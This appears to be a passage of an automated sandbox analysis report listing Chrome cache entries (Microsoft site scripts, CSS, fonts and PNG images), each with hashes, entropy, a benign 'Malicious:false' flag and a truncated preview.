                                                                                                                      URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/shell/_scrf/js/themes=default/54-af9f9f/d4-fb1f57/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/f9-a5b2ce/db-bc0148/dc-7e9864/6d-c07ea1/6f-dafe8c/f6-aa5278/73-a24d00/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/d0-e64f3e/92-10345d/79-499886/7e-cda2d3/58-ab4971/74-d51c79/e0-3c9860/de-884374/1f-100dea/33-abe4df/2b-8e0ae6?ver=2.0&_cf=02242021_3231&iife=1
                                                                                                                      Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0

                                                                                                                      Chrome Cache Entry: 352

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26647
                                                                                                                      Entropy (8bit):7.961164465196959
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:nhL1z7tVW03Npmi6K0i1WRphEQAjQLj9I32JxMqJn26OsNCVbgP6re0QG9d8b1P:h1zXWKYi90i+Az3cxMqV26pNAeTG9do
                                                                                                                      MD5:7343B003F48E30FBDDF87CFC795E860A
                                                                                                                      SHA1:12FF2D14D7666F516CAF23848113902A7D5570C6
                                                                                                                      SHA-256:B8B3DBA0B8C52DB7CCBFAD56815F0F38E83895488101C51AA580AD581D7115CC
                                                                                                                      SHA-512:39E291A9E69D1D22B414428148EA7795FF1D33F875BF823F0E8C96276431E7AAE5A1B4EF7F050492B9903214B5FE7B9B4C92FF1B68A03A614258BA04605640C5
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...g.IDATx....wUU./...`.2j2.&C `.X....L.H.b.1.B...1*.J.%5..Z%2....EH.$..../........~..y....=...Y....s....{.s.*+V.X..b.UVa.]..X5........:N.Z...5d.C.5.9.Yvl^..8....\im..h...M.9....l3[...h..w......f..:..'.W..2....y.(.$'..TD....].S.NSx(.z...J...~.!.b.J..o.AE.B.A.......>f:...:&...eYDTOV!....(E.G..&1.+.JY...&|J..M.K...J....w.$.h2...G1..[....}.....2E7a.rs.;..o....|.e..m...e.1..(.k.r...K".\.K.)..".(J..p.>.."*v...|..7.1C.L........S.w.g;....w....QB%.....%.Z].S..S../=.._.. -.......C..}b.....m..-..W..es....N....y..-.nS.T%..t3.IZQ.?.....R..Zxp.$yIc.....&d...2|.]...'...>.....&.T.'...B..%......Oj.Q....xkFR...+.|yH.s.B..>...*..J.SW,...Z.*d(...*.v..&,Y....Sf.....K.m.E.WL.~.B.D...&..c.Z..|l.li$.$.V.P}.BJ.~.p...T.IM..1>.'cn........!..6CR*&..Y.r.k....=.nL.->....2W......9...J....c.`S8A...R...(Q.N.V+K+.-........*..[b..]._{.."%D'-...e...R'...k.T!.(...Q...>R.#.-Y.}\......U*T../..

                                                                                                                      Chrome Cache Entry: 353

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1116
                                                                                                                      Entropy (8bit):4.788804799444485
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:L0xLFaXgj7O6mpLQqVBeVBr/LSxLSUS3Gpz:oxLFcwC6m1lVBeVBfSpSUS2Z
                                                                                                                      MD5:A054C8B2496A3D3097DACFA8BFBC6FEA
                                                                                                                      SHA1:B0F4A4CEC9C5D8C0899C61A6BA57030F41F1B54D
                                                                                                                      SHA-256:8C37F488ABB2EDF4CD90371137279F5FF32BFD8CF7ED47CC9A73380E2A5500CD
                                                                                                                      SHA-512:5161FC704908D7D43AA04549CE7F309810951B3B1D1C1330A3E564F2DA868E93B1DC7A4D1F4C25267F2C6017ED79BE7FE5287858E31257B00293B4DF2AA47A61
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/clientlibs/clientlib-windows.min.ACSHASHa054c8b2496a3d3097dacfa8bfbc6fea.css
                                                                                                                      Preview:.blue-offer-banner .banner a{color:#fff !important;line-height:1.4;border:0;text-decoration:none;font-size:15px;font-weight:400}..blue-offer-banner{margin-top:-2px}..blue-offer-banner .banner a:hover{text-decoration:underline}..blue-offer-banner .banner a span:before{position:relative;right:.2rem !important;top:2px}..blue-offer-banner.alert{min-height:auto !important}.html[dir=rtl] .blue-offer-banner .banner a span:before{position:absolute;right:auto !important;left:-15px;margin:inherit}.@media only screen and (max-width:539px){.mosaic-mobile-card-stacking div.mosaic.mr-5.ml-5{padding-left:0 !important;padding-right:0 !important;margin-left:0 !important;margin-right:0 !important}..mosaic-mobile-card-stacking .mosaic-tile .mosaic-card{flex-direction:column !important}..mosaic-mobile-card-stacking .mosaic-tile .mosaic-card .position-absolute{position:relative !important}.}..MLSD .showmore-custom-container.showmoreshowless>.container{margin:auto !important}..MLSD .article-custom-container

                                                                                                                      Chrome Cache Entry: 354

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (1789), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1789
                                                                                                                      Entropy (8bit):4.949297796790656
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:s02Yxod02La21d02/YKdXSd02WwKnccd02+49XX3Xsd02wGy/rd02XLryWrrd02O:sAwzXH2+9WqXHXW4GuJ/v9M
                                                                                                                      MD5:49696FC959CE2121F8FC42BC0A295EDF
                                                                                                                      SHA1:353FE5D1F17B396C81383059C66E73574991A78B
                                                                                                                      SHA-256:E0CFF5C0E0126AD78EB3DCDDA610AD22A32FB4AA37EBA19FEA990E8C3AB3918A
                                                                                                                      SHA-512:AF4C277F64FD43CE18E94EE797FB7C4B3D19BD84B0741DFC30AE6E1FE77809EBB36CAA0341A4A86405D275E0AF63A951E488370F4A689636560049AA71084E05
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/fonts/site-fonts.css?v=4M_1wOASateOs9zdphCtIqMvtKo366Gf6pkOjDqzkYo
                                                                                                                      Preview:@font-face{font-family:"Segoe UI Bold";font-display:swap;font-weight:700;src:local("Segoe UI Bold"),url(segoe-ui/west-european/bold/latest.woff2) format("woff2"),url(segoe-ui/west-european/bold/latest.woff) format("woff")}@font-face{font-family:"Segoe UI Light";font-display:swap;font-weight:100;src:local("Segoe UI Light"),url(segoe-ui/west-european/light/latest.woff2) format("woff2"),url(segoe-ui/west-european/light/latest.woff) format("woff")}@font-face{font-family:"Segoe UI Semibold";font-display:swap;font-weight:600;src:local("Segoe UI Semibold"),url(segoe-ui/west-european/semibold/latest.woff2) format("woff2"),url(segoe-ui/west-european/semibold/latest.woff) format("woff")}@font-face{font-family:"Segoe UI Semilight";font-display:swap;font-weight:200;src:local("Segoe UI Semilight"),url(segoe-ui/west-european/semilight/latest.woff2) format("woff2"),url(segoe-ui/west-european/semilight/latest.woff) format("woff")}@font-face{font-family:"Segoe UI";font-display:swap;font-weight:400;src:

                                                                                                                      Chrome Cache Entry: 355

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (4370), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):4370
                                                                                                                      Entropy (8bit):5.070419363669657
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:yUD4Nf5fpk+9/FPV/A/xtrmAxdAe8RiM1MTMNOMx7UIF/A1ERu84jC7UO7Flt8zx:b4TJ96rrmAxdAe8RiM1MTMNOMx7UIF/o
                                                                                                                      MD5:5F05B23BAD0F2D477C4E6B9266F99A74
                                                                                                                      SHA1:E6CC0BE0A86B8330B4FD16CE8EB27614FB313B40
                                                                                                                      SHA-256:70099F944DDCE86C3B9E24CE88C3C489EF4C63CEF20C4DA64A5DC33BBFE36512
                                                                                                                      SHA-512:664E997252C7A41F8D4E7A3FD34592D25809AFCD4EF9FB7A2542F9A3C05FC8F841D5F7E58DBF0A6F00C255F43C6A36D6597DDF5C7A0FFC049994002CC851ECB8
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/promotionbanner/promotion-banner.css?v=cAmflE3c6Gw7niTOiMPEie9MY87yDE2mSl3DO7_jZRI
                                                                                                                      Preview:/*! Copyright (C) Microsoft. All rights reserved. */.uhfupgradeBanner{display:block;max-height:110px;border-bottom:.5px solid #aeaeae;box-shadow:0 1px 5px 3px #ccc;margin-bottom:10px}.uhfupgradeBanner .uhfbanner-container{max-width:1640px;max-height:inherit;display:block;position:relative;width:92%;margin-left:auto;margin-right:auto;padding-left:1vw;padding-right:1vw}.uhfupgradeBanner .uhfbanner-container .uhfbanner-wrapper{display:flex;flex-wrap:wrap;max-height:inherit}.uhfupgradeBanner .uhfbanner-container .uhfbanner-wrapper .uhfbanner-content{width:75%;align-items:stretch;float:left;position:relative;padding-top:1.5em;padding-bottom:1.5em;max-height:inherit}.uhfupgradeBanner .uhfbanner-container .uhfbanner-wrapper .uhfbanner-controls-wrapper{align-items:stretch;float:left;position:relative;padding-top:1.1vw;padding-bottom:1vw;width:24%}.uhfupgradeBanner .uhfbanner-controls{float:right}.uhfupgradeBanner .promoHeading{font-weight:600;font-size:20px;margin:0;position:relative;font-fami

                                                                                                                      Chrome Cache Entry: 356

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2974), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2974
                                                                                                                      Entropy (8bit):5.078147905018725
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:5hpNPWqBPWsQxmpqrqysQxmpqAYP6PAQxmpqIQxmpqNs7QRlDAALAGaCqDY7KXKe:572MYXsVGQyfZ
                                                                                                                      MD5:8C4035FBAA828A7E23B8584328FE8F88
                                                                                                                      SHA1:F222869596F1E3E94C131DE6E85BF233ED1EC511
                                                                                                                      SHA-256:0F4950468225BC51D24014536FE8004392A415EF01F0DB92A258818E74F9C59E
                                                                                                                      SHA-512:74D807189427397E2C8FC35D986616C1104E9125B39F885F61D9A1AA225D566AB3474061B39C64FF69886E5AEA8D6B4C9F28B4DCC9CB6F552D90DB0C651582DB
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/sitewide/articleCss-overwrite.css?v=D0lQRoIlvFHSQBRTb-gAQ5KkFe8B8NuSoliBjnT5xZ4
                                                                                                                      Preview:div.shimmer-effect{display:flex;width:100%;height:300px}.shimmer-line-container{display:flex;flex-direction:column;width:100%;height:100%}.shimmer-line{background-color:#edebe9;position:relative}.banded-wrapper-reversed:nth-child(odd) .shimmer-line{background-color:#d7d4d2;position:relative}.banded-wrapper-reversed:nth-child(odd) .shimmer-line::before{content:"";width:50%;height:100%;position:absolute;top:0;left:0;background:linear-gradient(to right, #d7d4d2 0%, #b9b9b9 50%, #d7d4d2 100%);animation:shimmer 2s ease-out infinite}.banded-wrapper:nth-child(even) .shimmer-line{background-color:#d7d4d2;position:relative}.banded-wrapper:nth-child(even) .shimmer-line::before{content:"";width:50%;height:100%;position:absolute;top:0;left:0;background:linear-gradient(to right, #d7d4d2 0%, #b9b9b9 50%, #d7d4d2 100%);animation:shimmer 2s ease-out infinite}.shimmer-image-container{position:absolute;right:0;width:50%;top:5%}.banded-wrapper-reversed:nth-child(odd) .shimmer-image{position:relative;heig

                                                                                                                      Chrome Cache Entry: 357

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15286
                                                                                                                      Entropy (8bit):7.920093772155082
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:PBOSXIcsH16kp+153RInfDCuhcuCMmr+sAY:ADcsUs+7SfDJhcuCM0zAY
                                                                                                                      MD5:B1266F754B66F7B007B60511E2A2C4A0
                                                                                                                      SHA1:2A7A404B98732BDEB9CD63C7A672AC0011788AEB
                                                                                                                      SHA-256:B0A544B82B7B83A42F0AEC9C46909290726F4F57BF437264FBE0CB17C2827B7B
                                                                                                                      SHA-512:676C337E3B4A1C22D52C5000ED8ABF0E233C558C7B46A690CEC8ED26C76D2C6DAF265EBCBC51FB9B863A8D4E381ADA5859D4EEEC4DF30150C7FBA3B5F5DF8DC0
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...;KIDATx..{.-WU..-m).V.....b....&Fm.Fm...!Z..l)R.T!.a.(.QQ...U.gI..H.B...hy..-.O./.....:.....={....|..s..={....=k......~(...."..8..=e..4...>....m...i..t...}..-M.kd.c\b[...G.p...P..:&.@qbBS..!L..`>.RP=K...&...slX.S..t_)..L.....z.....u.[?.|.c..p>....r.UH-.9.,.>.cl.\t1...$..TWy..8......@!.b..:m...`Y,..06C.M...[.j....@?.H..Xn.F.4U.R-S5........l.\.....r.e.j...:..P'.)..%.Tn...g....N......M0.L.&R.H....L.....J.Oj.S.....0?.-RK....hs.g......X]..uS,R.c.C.[/..m....U..\C..y......E.B.H.G...[.......TE..BD...TM..)......MQK.R.gb.S.....@HU.....b...<...#.....K.?"..`..)..c..6.Q.r.T....`<.R3.%j..Ig`.....\..e..`Z.R.=.Sp.........Bj.....2..C....n.?.....(IQ!...L..T+..R.Z...#..vmn...).8.}7....@e..@G4....B..........AHA..]...,.V).!..L.B*..'..RI7..`<.R.3QB.......(.B.`a.o....P...;......1..`..\.s.....)uKmk.KX3.m....f...0.....d.l..@...I.....:......7$.E...m.....P....B.;.....P....B@.....B..2..S....

                                                                                                                      Chrome Cache Entry: 358

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65451)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):89476
                                                                                                                      Entropy (8bit):5.2896589255084425
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                      MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                      SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                      SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                      SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o

                                                                                                                      Chrome Cache Entry: 359

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):211842
                                                                                                                      Entropy (8bit):5.548839465294018
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:DismT/mHKxQlVyDqBPAizS7Mzm3NLJa2lQn+S/7qSASyntnh:2smT+X+NLJab+SzqSASyntnh
                                                                                                                      MD5:C1338BAD680C7B30034BB2BEE2C447D3
                                                                                                                      SHA1:E93C535395F25D15F4AA67E481DFCEAF94F25A1E
                                                                                                                      SHA-256:906A3B2A89AA06A9C0DA125FBF248D1F9FD188511B44D4822D9E3FCFD28197E8
                                                                                                                      SHA-512:AE28ACA7B8AAB00F7EAF2B5EBCE86F23DD1B91E711100110ED4E2B7B6A68A1284AF777EC87C652789BBBC50B5FA95A18A47A1D1F5B1FF65FDBC6E56EE6FA31E7
                                                                                                                      Malicious:false
                                                                                                                      URL:https://mem.gfx.ms/scripts/me/MeControl/10.24228.4/en-US/meBoot.min.js
                                                                                                                      Preview:MeControlDefine("meBoot",["exports","@mecontrol/web-inline"],function(t,S){"use strict";var c=function(){},i={},u=[],p=[];function O(t,e){var r,n,o,i,a=p;for(i=arguments.length;2<i--;)u.push(arguments[i]);for(e&&null!=e.children&&(u.length||u.push(e.children),delete e.children);u.length;)if((n=u.pop())&&void 0!==n.pop)for(i=n.length;i--;)u.push(n[i]);else"boolean"==typeof n&&(n=null),(o="function"!=typeof t)&&(null==n?n="":"number"==typeof n?n=String(n):"string"!=typeof n&&(o=!1)),o&&r?a[a.length-1]+=n:a===p?a=[n]:a.push(n),r=o;var s=new c;return s.nodeName=t,s.children=a,s.attributes=null==e?void 0:e,s.key=null==e?void 0:e.key,s}function T(t,e){for(var r in e)t[r]=e[r];return t}function d(t,e){t&&("function"==typeof t?t(e):t.current=e)}var e="function"==typeof Promise?Promise.resolve().then.bind(Promise.resolve()):setTimeout;var l=/acit|ex(?:s|g|n|p|$)|rph|ows|mnc|ntw|ine[ch]|zoo|^ord/i,r=[];function a(t){!t._dirty&&(t._dirty=!0)&&1==r.push(t)&&e(n)}function n(){for(var t;t=r.pop();)t

                                                                                                                      Chrome Cache Entry: 360

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20946
                                                                                                                      Entropy (8bit):7.93232536946356
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:ecpgK1ekapmcRcYDw6SaYAwQTniYPMalqQm6vkoP9njpqNT:eKjUkapAsw6C9ePM2qQm6vkoFnwT
                                                                                                                      MD5:68B6034D22E6083CF2592BF4B8B71F0E
                                                                                                                      SHA1:0981B22AF5F2BF930794557717FF7C7F4FF563FF
                                                                                                                      SHA-256:56E5D47C342207184BE9DE6E3CF06CF26C32B34EE799B3ACC95EBEEEEFA5484A
                                                                                                                      SHA-512:3CDA6510769E8EE427103B1D76A0035E2A3E62C4EF0E789DBC28969B12F2DF2C1F7E7652FDF9CC99C7C086CF2764A19520D15A5FED86ECC5CAB9D9F77D534E93
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...QgIDATx....nEy....j.%bU.X..n^......Im..M."Z...+hU...m.e.....A.FQ.m......D....ELTD...Uo}...>.|3....v....y..gf.:.?.yf..n.m..a..*......+.~..J u..}.k.........:;v.P......qM.c;.1.S..j..@v....O...c.@.....5Z.P.E{...P.(.......PvvQ..... .IGj...U.:}.#..Xghj.C.MQ...Kua...)G,4]..?.........#.......w.Ti'.Vy....S....%._).'...J...%.u\.R.Oo.R,p......"Y....N:V*.P.R.W......O..Pk...n......Z.....).....HVc.Z.M....H....X......5....$....p......".>...<U...Sc.|.K...Q.NR...k...k...F...).....H...=.....+.zj(....]/5.\.........).....H...\.@.;.|......*.I.&5.'.(6.cTz^.....c.r...r....k.)s.b..<.#......I.1R....k..6........R.d....r.]...NT].H.....D.#%.N..X.......7.t,..z.;cS.p].f....E-...6.#......IuG...p..c[.g.`..v..R1V...J.9.J... ..HqIw.NS..........3.G..pI.+p.....#.N.......Gp....).....Hf.H..1.#.*4..2r.f....t..;.Z.7W........".=1d...^.....M ..I..T...../.t.T...........*....._JLz)......{..h*FJ...E..t9.).WaXj&

                                                                                                                      Chrome Cache Entry: 361

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (728)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):11405
                                                                                                                      Entropy (8bit):5.337832455968521
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ei4mI8A10VNEHbnIB89tGRbvlG/bUgck7L8Dap8z+vRjQfymrQy1Zy1Gy1M+qmWW:eiy1F7nIB89tGRbvaUBvk8qjQfymrQy8
                                                                                                                      MD5:FF9CACB22668C4F6174E0AF4A2BE89F9
                                                                                                                      SHA1:EC9ED15001A3E13404660B6EA09F99C512E08882
                                                                                                                      SHA-256:EF39A5CC6826231852FD8D60736867DA31E7E9036F3575B1DC4846DC6FB86A3B
                                                                                                                      SHA-512:267064DCB16AB4B9B19756C2313CCB9E5B467A41427DE9BF46158A1C2231699EC43D51C2F201D97C02AFA31BF5011FF471035CF10C7DC6003299B86D85C52806
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';var UHFButton=$("header #c-uhf-nav-cta \x3e a");0<$("meta[name\x3d'blue-cta']").length&&UHFButton.addClass("blue-cta");UHFButton.css("visibility","visible");var mainLandmark=$("main"),rootNode=$(".root");0< !mainLandmark.length&&0<rootNode.length&&rootNode.attr("role","main");.function changeSupToAnchor(){try{var a="",b="",c=[];$("sup:not(.no-link)").each(function(){a=$(this).text();a=a.replace("*(","");a=a.replace(")","");c=a.split(", ");for(var e=0;e<c.length;e++)b+="\x3ca aria-label\x3d'Footnote "+c[e]+"' href\x3d'javascript:void(0);' class\x3d'c-hyperlink supBLink'\x3e\x3cspan class\x3d'supText'\x3e"+c[e]+"\x3c/span\x3e\x3c/a\x3e\x3cspan\x3e, \x3c/span\x3e";$(this).html(b);b=""});$("sup").find("span:last").remove();var d=$(".list-unstyled li a.superscript");d.attr("href",."javascript:void(0);");d.addClass("supLink");d.each(function(){0==$(this).find(".supFn").length&&$(this).wrapInner("\x3cspan class\x3d'supFn'\x3e\x3c/span\x3e")})}catch(e){console.log(e)}}.function n

                                                                                                                      Chrome Cache Entry: 362

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):18254
                                                                                                                      Entropy (8bit):7.950218967534029
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:4ZgtqkzeTs36Io/E0ZadkL8eExKAF+2/IEBTbztwaLAWoAGuJ:4aBzwWunZayL8eExKAFtQOTbzCak92
                                                                                                                      MD5:334DB99BB88BA472A3116C0B3A7449DE
                                                                                                                      SHA1:12B43CCBAA0A58336319B7AD981F8EECE202228F
                                                                                                                      SHA-256:2853C551260E74FD1BADFBBCBA7ADC12539FC2BBC6124516D3AE4F3BDD76A2CA
                                                                                                                      SHA-512:8AB869E0D4201A8F1BF2FDAE69524E481E80502D0881837D57B7ECF91075E0BE3A0DDFCD4E045B0CD5FEEFB405067A0EE76B1CFEA902C43D546AE9AF9F0DB469
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/9255871d-06a6-4de5-9236-5fd7af100c5c.png
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...F.IDATx..y.&Uu....P. .&"...........`...".!e$.e..M.Q..T.d...18....HJ+j.@R.E+&e"..,%K.B.f.?.Y..4.g..v....ow.>U]........o.s.;........a...\.-[....cIN3.......Pr<._.r.{B............[.).5k*..{..G.).n.........V....]n.{...5.....L..P+..%7.mW&,R..=..\...pu.T.s.J...._.....2........xW..s$TL.eCIu.9. $.INm..m.]{c_l*....~..q..x...G.........=..r.`Z.X.b.)PO-.Dg...Iu..v.R....F. .-....E.Hix......*57B.5.!.....".029...@O...}.r"..S.....a_..#....qhO..<..s.C..7.~.E..... .....}........,../2X...`...L..pZ.}...k...e..aM.u........k.^U~..z.@.f..2.:.......!*m.v.0........3D...}.&.$..@ZB-T.J.=.. .].+..>.....!..0SR7R.3.3m..)...0.....y..PFm...{<S....s.'...`!....z..O..y.u....@Zrp..b.c...=........:..:F.'+BJ..'.@..v.K.=..b.PU.h}.*.H...... .,R.R[..g.$....:........".\s{.8.Kh..F.hz..R.....&..'...%..)..S..m.......s.k.. cb..,....p.H.U.....")..t..)...Z...i.W..\.`!...S..C.5.Z..........$.j..b....l*em.t^..K...hr

                                                                                                                      Chrome Cache Entry: 363

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (367), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):367
                                                                                                                      Entropy (8bit):4.9898089353102595
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:Q3RnadmyWRLnadIrM9nadYErmC+LGI1nadmWYElnH0IASS3c7swWJ/cxGPvZ/c8e:cYdIRGdIg8dlHEGIUd4Eh0IA1cbWNb9u
                                                                                                                      MD5:F81E446FAC9DB5FB37845DD4E069AE27
                                                                                                                      SHA1:DE12C417D44EC6A6AC52D5D41BBB35CE8C9A2097
                                                                                                                      SHA-256:CD4B2B854F0E1BF350B4E61D015794D0F33A0B187A0C78912085E4DB1CD65F0B
                                                                                                                      SHA-512:E13DDEDB6117E516E4278E4F1B6AA80DD62EAF8966E64F5D45D452D85FE2AAD990D770101934BC12AA37B4CDF8D3B3B86DDBD116B53E7C1AE1BFD73AA9C18584
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';$(function(){var a=document.querySelector("#msChatContainer"),b=document.querySelector(".back-to-top.sticky"),c=document.querySelector(".fixed-back-to-top.fixed-sticky"),d=!(!document.querySelector("#storeassistantroot")||!window.storeAssistantReactJsLib);a&&b&&!d&&$(b).addClass("pageHasChatContainer");a&&c&&!d&&$(c).addClass("pageHasChatContainer")});

                                                                                                                      Chrome Cache Entry: 364

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):631
                                                                                                                      Entropy (8bit):6.391875872958697
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:6v/7s6UVprYe6IZeuLgou+/CAztgbbvCR00aJzS4VQIjXuYEMwoQIjXuHBOLPMdo:hX7rRkf+/rMcCJzAIjNEMwNIj8Efl9
                                                                                                                      MD5:FB2ED9313C602F40B7A2762ACC15FF89
                                                                                                                      SHA1:8A390D07A8401D40CBC1A16D873911FA4CB463F5
                                                                                                                      SHA-256:B241D02FAB4B17291AF37993EB249F9303EB5897610ABAFAC4C9F6AA6A878369
                                                                                                                      SHA-512:9CBCF5C7B8409494F6D543434ECAFF42DE8A2D0632A17931062D7D1CC130D43E61162EEDB0965B545E65E0687DED4D4B51E29631568AF34B157A7D02A3852508
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/favicon-32x32.png
